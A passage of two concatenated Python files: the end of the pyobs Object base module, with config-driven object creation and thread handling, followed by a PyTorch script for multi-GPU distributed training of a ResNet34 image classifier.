-> ObjectClass:
"""Creates object from config or returns object directly, both optionally after check of type.
Args:
config_or_object: A configuration dict or an object itself to create/check. If a dict with a class key
is given, a new object is created.
object_class: Class to check object against.
Returns:
(New) object (created from config) that optionally passed class check.
Raises:
TypeError: If the object does not match the given class.
"""
if config_or_object is None:
# nothing to do?
raise TypeError('No config or object given.')
elif isinstance(config_or_object, dict):
# a dict is given, so create object
obj = create_object(config_or_object, *args, **kwargs)
else:
# just use given object
obj = config_or_object
# do we need a type check and does the given object pass?
if object_class is not None and not isinstance(obj, object_class):
raise TypeError('Provided object is not of requested type %s.' % object_class.__name__)
return obj
def get_class_from_string(class_name):
parts = class_name.split('.')
module_name = ".".join(parts[:-1])
cls = __import__(module_name)
for comp in parts[1:]:
cls = getattr(cls, comp)
return cls
def create_object(config: dict, *args, **kwargs):
# get class name
class_name = config['class']
# create class
klass = get_class_from_string(class_name)
# create object
return klass(*args, **config, **kwargs)
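# A minimal sketch of the config convention handled above (illustrative; the
# dotted class path is a made-up example, not a real pyobs module):
#
#   cfg = {'class': 'mypackage.cameras.FakeCamera', 'exposure_time': 1.0}
#   cam = get_object(cfg)                       # imports the class and creates it from the dict
#   cam = get_object(cam, object_class=Object)  # passing an object only runs the type check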
class Object:
"""Base class for all objects in *pyobs*."""
def __init__(self, vfs: Union[pyobs.vfs.VirtualFileSystem, dict] = None,
timezone: Union[str, datetime.tzinfo] = 'utc', location: Union[str, dict, EarthLocation] = None,
*args, **kwargs):
"""
.. note::
Objects must always be opened and closed using :meth:`~pyobs.object.Object.open` and
:meth:`~pyobs.object.Object.close`, respectively.
This class provides a :class:`~pyobs.vfs.VirtualFileSystem`, a timezone and a location. From the latter two, an
observer object is automatically created.
Object also adds support for easily adding threads using the :meth:`~pyobs.object.Object.add_thread_func`
method as well as a watchdog thread that automatically restarts threads, if requested.
Using :meth:`~pyobs.object.Object.add_child_object`, other objects can be (created an) attached to this object,
which then automatically handles calls to :meth:`~pyobs.object.Object.open` and :meth:`~pyobs.object.Object.close`
on those objects.
Args:
vfs: VFS to use (either object or config)
timezone: Timezone at observatory.
location: Location of observatory, either a name or a dict containing latitude, longitude, and elevation.
"""
from pyobs.vfs import VirtualFileSystem
# an event that will be fired when closing the module
self.closing = threading.Event()
# child objects
self._child_objects: List[Object] = []
# create vfs
if vfs:
self.vfs = get_object(vfs, VirtualFileSystem)
else:
self.vfs = VirtualFileSystem()
# timezone
if isinstance(timezone, datetime.tzinfo):
self.timezone = timezone
elif isinstance(timezone, str):
self.timezone = pytz.timezone(timezone)
else:
raise ValueError('Unknown format for timezone.')
log.info('Using timezone %s.', timezone)
# location
if location is None:
self.location = None
elif isinstance(location, EarthLocation):
self.location = location
elif isinstance(location, str):
self.location = EarthLocation.of_site(location)
elif isinstance(location, dict):
self.location = EarthLocation.from_geodetic(location['longitude'], location['latitude'],
location['elevation'])
else:
raise ValueError('Unknown format for location.')
# create observer
self.observer: Optional[Observer] = None
if self.location is not None:
log.info('Setting location to longitude=%s, latitude=%s, and elevation=%s.',
self.location.lon, self.location.lat, self.location.height)
self.observer = Observer(location=self.location, timezone=timezone)
# opened?
self._opened = False
# thread function(s)
self._threads: Dict[threading.Thread, Tuple] = {}
self._watchdog = threading.Thread(target=self._watchdog_func, name='watchdog')
def add_thread_func(self, func: Callable, restart: bool = True):
"""Add a new function that should be run in a thread.
MUST be called in constructor of derived class or at least before calling open() on the object.
Args:
func: Func to add.
restart: Whether to restart this function.
"""
# create thread
t = threading.Thread(target=Object._thread_func, name=func.__name__, args=(func,))
# add it
self._threads[t] = (func, restart)
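    # Sketch of how a derived class is expected to use this (illustrative;
    # MyModule and its _poll method are hypothetical):
    #
    #   class MyModule(Object):
    #       def __init__(self, **kwargs):
    #           super().__init__(**kwargs)
    #           self.add_thread_func(self._poll, restart=True)
    #
    #       def _poll(self):
    #           while not self.closing.is_set():
    #               self.closing.wait(10)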
def open(self):
"""Open module."""
# start threads and watchdog
for thread, (target, _) in self._threads.items():
log.info('Starting thread for %s...', target.__name__)
thread.start()
if len(self._threads) > 0 and self._watchdog:
self._watchdog.start()
# open child objects
for obj in self._child_objects:
if hasattr(obj, 'open'):
obj.open()
# success
self._opened = True
@property
def opened(self):
"""Whether object has been opened."""
return self._opened
def close(self):
"""Close module."""
# request closing of object (used for long-running methods)
self.closing.set()
# close child objects
for obj in self._child_objects:
if hasattr(obj, 'close'):
obj.close()
# join watchdog and then all threads
if self._watchdog and self._watchdog.is_alive():
self._watchdog.join()
[t.join() for t in self._threads.keys() if t.is_alive()]
@staticmethod
def _thread_func(target):
"""Run given function.
Args:
target: Function to run.
"""
try:
target()
except:
log.exception('Exception in thread method %s.' % target.__name__)
def _watchdog_func(self):
"""Watchdog thread that tries to restart threads if they quit."""
while not self.closing.is_set():
# get dead threads that need to be restarted
dead = {}
for thread, (target, restart) in self._threads.items():
if not thread.is_alive():
dead[thread] = (target, restart)
# restart dead threads or quit
for thread, (target, restart) in dead.items():
if restart:
log.error('Thread for %s has died, restarting...', target.__name__)
del self._threads[thread]
thread = threading.Thread(target=target, name=target.__name__)
thread.start()
self._threads[thread] = (target, restart)
else:
log.error('Thread for %s has died, quitting...', target.__name__)
self.quit()
return
# sleep a little
self.closing.wait(1)
def check_running(self):
"""Check, whether an object should be closing. Can be polled by long-running methods.
Raises:
InterruptedError: Raised when object should be closing.
"""
if self.closing.is_set():
raise InterruptedError
return True
def add_child_object(self, config_or_object: Union[dict, object] = None, object_class: ObjectClass = None,
**kwargs) -> ObjectClass:
"""Create a new sub-module, which will automatically be opened and closed.
        Args:
            config_or_object: Module definition as a config dict, or an already-created object.
            object_class: Optional class the created object is checked against.
        Returns:
            The created module.
"""
# what did we get?
if isinstance(config_or_object, dict):
            # a config dict was given, so create the object from it
obj = get_object(config_or_object, object_class=object_class,
timezone=self.timezone, location=self.location, **kwargs)
elif config_or_object is not None:
# seems we got an object directly, try to set timezone and location
obj = config_or_object
if hasattr(config_or_object, 'timezone'):
config_or_object.timezone = self.timezone
if hasattr(config_or_object, 'location'):
config_or_object.location = self.location
elif object_class is not None:
# no config or object given, do we have a class?
obj = object_class(**kwargs, timezone=self.timezone, location=self.location)
else:
# not successful
raise ValueError('No valid object description given.')
# add to list
self._child_objects.append(obj)
# return it
return obj
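    # Sketch: attaching a child object from a config dict (illustrative; the
    # class path in the dict is a placeholder):
    #
    #   self.camera = self.add_child_object({'class': 'mypackage.cameras.FakeCamera'})
    #   # open()/close() on this object now also open/close self.camera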
__all__ = ['get_object', 'get_class_from_string', 'create_object', 'Object']
|
train_multi_gpu_using_spawn.py
|
import os
import math
import tempfile
import argparse
import torch
import torch.multiprocessing as mp
from torch.multiprocessing import Process
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
from torch.utils.tensorboard import SummaryWriter
from torchvision import transforms
from model import resnet34
from my_dataset import MyDataSet
from utils import read_split_data, plot_data_loader_image
from multi_train_utils.distributed_utils import dist, cleanup
from multi_train_utils.train_eval_utils import train_one_epoch, evaluate
def main_fun(rank, world_size, args):
if torch.cuda.is_available() is False:
        raise EnvironmentError("No GPU device found for training.")
    # initialize the per-process distributed environment: start
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "12355"
args.rank = rank
args.world_size = world_size
args.gpu = rank
args.distributed = True
torch.cuda.set_device(args.gpu)
args.dist_backend = 'nccl'
print('| distributed init (rank {}): {}'.format(
args.rank, args.dist_url), flush=True)
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
dist.barrier()
    # initialize the per-process distributed environment: end
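    # Note: this function is meant to be launched once per GPU, e.g. (sketch only;
    # the argument names are assumed and the actual spawn call lives outside this snippet):
    #
    #   world_size = torch.cuda.device_count()
    #   mp.spawn(main_fun, args=(world_size, args), nprocs=world_size)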
rank = args.rank
device = torch.device(args.device)
batch_size = args.batch_size
num_classes = args.num_classes
weights_path = args.weights
    args.lr *= args.world_size  # scale the learning rate with the number of parallel GPUs
    if rank == 0:  # print info and create the TensorBoard writer only in the first process
print(args)
print('Start Tensorboard with "tensorboard --logdir=runs", view at http://localhost:6006/')
tb_writer = SummaryWriter()
if os.path.exists("./weights") is False:
os.makedirs("./weights")
train_info, val_info, num_classes = read_split_data(args.data_path)
train_images_path, train_images_label = train_info
val_images_path, val_images_label = val_info
# check num_classes
assert args.num_classes == num_classes, "dataset num_classes: {}, input {}".format(args.num_classes,
num_classes)
data_transform = {
"train": transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]),
"val": transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])}
    # instantiate the training dataset
train_data_set = MyDataSet(images_path=train_images_path,
images_class=train_images_label,
transform=data_transform["train"])
    # instantiate the validation dataset
val_data_set = MyDataSet(images_path=val_images_path,
images_class=val_images_label,
transform=data_transform["val"])
    # assign each rank's process its own subset of training sample indices
train_sampler = torch.utils.data.distributed.DistributedSampler(train_data_set)
val_sampler = torch.utils.data.distributed.DistributedSampler(val_data_set)
    # group the sample indices into lists of batch_size elements each
train_batch_sampler = torch.utils.data.BatchSampler(
train_sampler, batch_size, drop_last=True)
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
if rank == 0:
print('Using {} dataloader workers every process'.format(nw))
train_loader = torch.utils.data.DataLoader(train_data_set,
batch_sampler=train_batch_sampler,
pin_memory=True,
num_workers=nw,
collate_fn=train_data_set.collate_fn)
val_loader = torch.utils.data.DataLoader(val_data_set,
batch_size=batch_size,
sampler=val_sampler,
pin_memory=True,
num_workers=nw,
collate_fn=val_data_set.collate_fn)
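    # Added note: the training loader feeds a BatchSampler built on top of the
    # DistributedSampler, so every rank draws disjoint, full batches (drop_last=True),
    # while the validation loader shards individual samples across ranks; the accuracy
    # computed below divides by val_sampler.total_size, which assumes evaluate() reduces
    # the correct-prediction count across all processes.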
    # instantiate the model
    model = resnet34(num_classes=num_classes).to(device)

    checkpoint_path = os.path.join(tempfile.gettempdir(), "initial_weights.pt")
    # load pre-trained weights if a weights file exists
    if os.path.exists(weights_path):
        weights_dict = torch.load(weights_path, map_location=device)
        load_weights_dict = {k: v for k, v in weights_dict.items()
                             if model.state_dict()[k].numel() == v.numel()}
        model.load_state_dict(load_weights_dict, strict=False)
    else:
        # without pre-trained weights, save the weights of the first process and load them
        # in every other process so that all processes start from identical parameters
        if rank == 0:
            torch.save(model.state_dict(), checkpoint_path)

        dist.barrier()
        # note: map_location must be specified here, otherwise the first GPU ends up
        # holding extra copies of the weights
        model.load_state_dict(torch.load(checkpoint_path, map_location=device))

    # optionally freeze weights
    if args.freeze_layers:
        for name, para in model.named_parameters():
            # freeze every layer except the final fully connected layer
            if "fc" not in name:
                para.requires_grad_(False)
    else:
        # SyncBatchNorm only makes sense when the network actually contains BN layers
        if args.syncBN:
            # training is slower with SyncBatchNorm enabled
            model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)

    # wrap the model with DistributedDataParallel
    model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])

    # optimizer
    pg = [p for p in model.parameters() if p.requires_grad]
    optimizer = optim.SGD(pg, lr=args.lr, momentum=0.9, weight_decay=0.005)
    # Scheduler https://arxiv.org/pdf/1812.01187.pdf
    lf = lambda x: ((1 + math.cos(x * math.pi / args.epochs)) / 2) * (1 - args.lrf) + args.lrf  # cosine
    scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
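    # Added note: the LambdaLR factor lf decays from 1.0 at epoch 0 to args.lrf at the
    # final epoch along a half cosine, so the effective learning rate is roughly
    # lr(epoch) = args.lr * (((1 + cos(pi * epoch / epochs)) / 2) * (1 - args.lrf) + args.lrf).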
    for epoch in range(args.epochs):
        train_sampler.set_epoch(epoch)

        mean_loss = train_one_epoch(model=model,
                                    optimizer=optimizer,
                                    data_loader=train_loader,
                                    device=device,
                                    epoch=epoch)

        scheduler.step()

        sum_num = evaluate(model=model,
                           data_loader=val_loader,
                           device=device)
        acc = sum_num / val_sampler.total_size

        if rank == 0:
            print("[epoch {}] accuracy: {}".format(epoch, round(acc, 3)))

            tags = ["loss", "accuracy", "learning_rate"]
            tb_writer.add_scalar(tags[0], mean_loss, epoch)
            tb_writer.add_scalar(tags[1], acc, epoch)
            tb_writer.add_scalar(tags[2], optimizer.param_groups[0]["lr"], epoch)

            torch.save(model.module.state_dict(), "./weights/model-{}.pth".format(epoch))

    # remove the temporary checkpoint file
    if rank == 0:
        if os.path.exists(checkpoint_path):
            os.remove(checkpoint_path)

    cleanup()
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--num_classes', type=int, default=5)
    parser.add_argument('--epochs', type=int, default=30)
    parser.add_argument('--batch-size', type=int, default=16)
    parser.add_argument('--lr', type=float, default=0.001)
    parser.add_argument('--lrf', type=float, default=0.1)
    # whether to enable SyncBatchNorm
    parser.add_argument('--syncBN', type=bool, default=True)

    # root directory of the dataset
    # http://download.tensorflow.org/example_images/flower_photos.tgz
    parser.add_argument('--data-path', type=str, default="/home/wz/data_set/flower_data/flower_photos")

    # download URL for the official resnet34 weights
    # https://download.pytorch.org/models/resnet34-333f7ec4.pth
    parser.add_argument('--weights', type=str, default='resNet34.pth',
                        help='initial weights path')
    parser.add_argument('--freeze-layers', type=bool, default=False)
    # do not change this argument; it is assigned automatically
    parser.add_argument('--device', default='cuda', help='device id (i.e. 0 or 0,1 or cpu)')
    # number of processes to launch (processes, not threads); on a single machine this
    # equals the number of GPUs to use
    parser.add_argument('--world-size', default=4, type=int,
                        help='number of distributed processes')
    parser.add_argument('--dist-url', default='env://', help='url used to set up distributed training')
    opt = parser.parse_args()

    # When using mp.spawn with num_workers greater than 1, training and validation
    # stalled for about 10 seconds before every epoch, so plain Processes are used below.
    # mp.spawn(main_fun,
    #          args=(opt.world_size, opt),
    #          nprocs=opt.world_size,
    #          join=True)
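    # Added note: mp.spawn (commented out above) and the explicit Process loop below are
    # otherwise interchangeable here; both launch one process per GPU running main_fun,
    # but the Process loop avoided the per-epoch stall the author observed with mp.spawn.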
    world_size = opt.world_size

    processes = []
    for rank in range(world_size):
        p = Process(target=main_fun, args=(rank, world_size, opt))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
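    # Example invocation (paths are placeholders; set --world-size to the GPU count):
    #   python train_multi_gpu_using_spawn.py --world-size 4 \
    #       --data-path /home/wz/data_set/flower_data/flower_photos --weights resNet34.pth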
|